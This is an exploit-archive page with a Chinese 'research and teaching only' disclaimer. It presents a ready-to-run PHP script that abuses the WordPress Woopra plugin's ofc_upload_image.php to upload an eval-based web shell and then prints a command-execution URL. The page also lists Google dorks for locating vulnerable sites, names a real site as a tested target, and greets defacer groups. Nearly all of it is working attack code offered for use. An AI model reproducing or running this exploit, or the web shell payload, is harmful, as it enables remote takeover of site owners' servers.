WordPress Woopra plugin remote PHP arbitrary code execution exploit.

测试方法:

提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

1. # Exploit Title: woopra plugins execute arbitrary PHP code Exploit
2. # Google Dork: inurl:/plugins/woopra/inc/php-ofc-library , inurl:wp-content/plugins/woopra/inc/
3. # Date: [06-10-2013]
4. # Exploit Author: wantexz
5. # Vendor Homepage:wordpress.org/plugins/woopra/
6. # Software Link: wordpress.org/plugins/woopra
7. # Version: woopra
8. # Tested on: [wantexz]
9. # CVE :
10. # target tested: http://zainhd.com/wp-content/plugins/woopra/inc/php-ofc-library/ofc_upload_image.php
11.  
12.  
13. ############################################################################################
14. # INDONESIANCODER
15. # by
16. # WANTEXZ
17. #
18. ############################################################################################
19.  
20.  
21. <?php
22.  
23. # woopra plugins ~ Exploit
24. # http://indonesiancoder.com/
25. #
26.  
27. echo <<<EOT
28.  
29. # -----------------------------------
30. #/ woopra ~ Exploit
31. # Author: wantexz /
32. # -----------------------------------
33.  
34. ################################################################################################
35. # Author: WANTEXZ
36. #
37. # thank to : tukulesto,arianom,cimpli,jack_jahat,k4L0NG666,Br3NG0S,Xr0b0t,blie,KaMtiEz,Mboys
38. # all indonesian coder, indonesian defacer, kill-9
39. ,jatimcom , malangcyber
40. #
41. ################################################################################################
42.  
43. EOT;
44.  
45.  
46. $options = getopt('u:f:');
47.  
48. if(!isset($options['u'], $options['f']))
49. die(" Usage example: php IDC.php -u http://target.com/ -f shell.php
50. -u http://target.com/ The full path to Joomla!
51. -f shell.php The name of the file to create. ");
52.  
53. $url = $options['u'];
54. $file = $options['f'];
55.  
56.  
57. $shell ="{$url}//wp-content/plugins/woopra/inc/tmp-upload-images/{$file}";
58. $url ="{$url}/wp-content/plugins/woopra/inc/php-ofc-library/ofc_upload_image.php?name={$file}";
59.  
60. $data ="<?php eval($_GET['cmd']); ?>";
61. $headers = array('User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64;
62. rv:15.0) Gecko/20100101 Firefox/15.0.1',
63. 'Content-Type: text/plain');
64.  
65.  
66. echo " [+] Submitting request to: {$options['u']} ";
67.  
68.  
69. $handle = curl_init();
70.  
71. curl_setopt($handle, CURLOPT_URL, $url);
72. curl_setopt($handle, CURLOPT_HTTPHEADER, $headers);
73. curl_setopt($handle, CURLOPT_POSTFIELDS, $data);
74. curl_setopt($handle, CURLOPT_RETURNTRANSFER,true);
75.  
76. $source = curl_exec($handle);
77. curl_close($handle);
78.  
79.  
80. if(!strpos($source,'Undefined variable: HTTP_RAW_POST_DATA')&&
81. @fopen($shell,'r'))
82. {
83. echo " [+] Exploit completed successfully! ";
84. echo " ______________________________________________
85. {$shell}?cmd=system('id'); ";
86. }
87. else
88. {
89. die(" [+] Exploit was unsuccessful. ");
90. }
91.  
92. ?>